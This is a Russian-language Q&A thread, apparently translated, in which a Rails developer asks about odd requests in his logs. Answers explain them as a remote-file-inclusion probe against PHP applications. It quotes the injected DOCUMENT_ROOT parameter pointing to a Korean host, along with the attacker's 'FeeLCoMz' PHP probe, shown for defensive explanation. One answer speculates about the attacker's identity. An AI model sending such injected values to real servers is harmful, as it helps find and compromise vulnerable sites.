Назад | Перейти на главную страницу

Странные запросы с корейского сайта

В последнее время я нахожу много странных запросов, подобных этому, приходящих в мое приложение rails:

Processing ApplicationController#index (for 189.30.242.61 at 2009-12-14 07:38:24) [GET]
  Parameters: {"_SERVER"=>{"DOCUMENT_ROOT"=>"http://www.usher.co.kr/bbs/id1.txt???"}}

ActionController::RoutingError (No route matches "/browse/brand/nike  ///" with {:method=>:get}):

Похоже, это автоматизировано, поскольку я получаю их много и замечаю странные параметры, которые они пытаются отправить:

_SERVER"=>{"DOCUMENT_ROOT"=>"http://www.usher.co.kr/bbs/id1.txt???

Является ли это чем-то злым, и если да, то что мне с этим делать?

Если вы откроете указанный документ на корейском сервере (мне, вероятно, не следовало, но я сделал;), он говорит:

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

При поиске в сети похоже, что это эксплойт для Joomla, Wordpress и / или Firestats (на разных сайтах упоминаются разные цели). Если вы используете какой-либо из них, обязательно обновите его до последней версии.

Больше информации здесь: http://urbanoalvarez.es/blog/2009/09/24/feelcomz-rfi/ и тут: http://tech.sweetnam.eu/2009/06/firestats-wordpress-exploit/

Это не эксплойт: он просто пытается найти уязвимые серверы, позволяющие заменить $_SERVER['DOCUMENT_ROOT'] Переменная PHP.

Это работает так: если сервер уязвим, на странице печатается «FeeLCoMz». Это обнаруживается скриптом, отправившим запрос, и сайт добавляется в базу данных серверов, которые вскоре станут гордыми участниками ботнета :)

Код, вставленный Шоном Эрпом выше, - это всего лишь тестовый код, чтобы увидеть, уязвима ваша система или нет. Затем, если ваша система уязвима, наступает основная атака. Ваша система находится под контролем злоумышленника. Злоумышленник делает вашу систему IRC-сервером для своих друзей и делится всеми вашими файлами с другими. или использует вашу систему как жертву для атаки на другие IP-адреса. или удаляет все, что у вас есть, или вынимает ваши пароли, или подделывает данные ваших клиентов и т. д. Есть статья на Анатомия и анализ атак удаленного внедрения кода Там приведены примеры некоторых реальных кодов атак.

Я также некоторое время следил, чтобы узнать, кто такой FeelComz. Я обнаружил, что бедный индонезийский ребенок днем ​​и ночью играет на сайтах irc. У него есть личная страница на индонезийском сайте Friendster. Похоже, он благодарит вас за помощь, которую вы оказали его стране после цунами.